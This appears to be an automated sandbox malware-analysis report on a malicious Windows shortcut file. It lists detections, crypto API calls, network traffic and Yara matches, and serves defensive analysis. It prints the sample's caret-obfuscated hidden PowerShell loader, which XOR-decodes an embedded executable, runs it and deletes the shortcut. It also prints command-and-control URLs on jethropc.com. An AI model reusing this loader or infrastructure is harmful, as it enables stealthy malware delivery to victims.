vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\W

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: knfV5IVjEV.lnk	ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for sample

Source: knfV5IVjEV.lnk

Joe Sandbox ML: detected

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDCB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,	8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	8_2_00007FF7F1DDF310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DDF4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE64F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	8_2_00007FF7F1DE64F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9C9C CryptHashData,	8_2_00007FF7F1DE9C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DE9C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9BD0 CryptAcquireContextA,CryptCreateHash,	8_2_00007FF7F1DE9BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	8_2_00007FF7F1DE934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE8F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	8_2_00007FF7F1DE8F14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE6560 CryptHashData,	8_2_00007FF7F1DE6560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE6570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DE6570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8CB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,	12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	12_2_00007FF700E8F310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99BD0 CryptAcquireContextA,CryptCreateHash,	12_2_00007FF700E99BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	12_2_00007FF700E9934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E964F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	12_2_00007FF700E964F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E8F4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99C9C CryptHashData,	12_2_00007FF700E99C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E99C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E96570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E96570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E96560 CryptHashData,	12_2_00007FF700E96560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E98F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	12_2_00007FF700E98F14

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: -----BEGIN PUBLIC KEY-----		8_2_00007FF7F1DBD6F4
Source: GSlLzFnTov.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source:	Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB20E0 malloc,recv,send,WSAGetLastError,

8_2_00007FF7F1DB20E0

Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /

Source: GSlLzFnTov.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe.1.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: unknown

DNS traffic detected: queries for: jethropc.com

Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/P
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=
Source: knfV5IVjEV.lnk	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481469904.000001C4E455D000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%
Source: GSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com
Source: GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e
Source: GSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O
Source: GSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y
Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: knfV5IVjEV.lnk, type: SAMPLE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: amsi64_7732.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago

Very long command line found

Source: unknown	Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2948	Jump to behavior

Windows shortcut file (LNK) contains suspicious command line arguments

Source: knfV5IVjEV.lnk

LNK file: /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 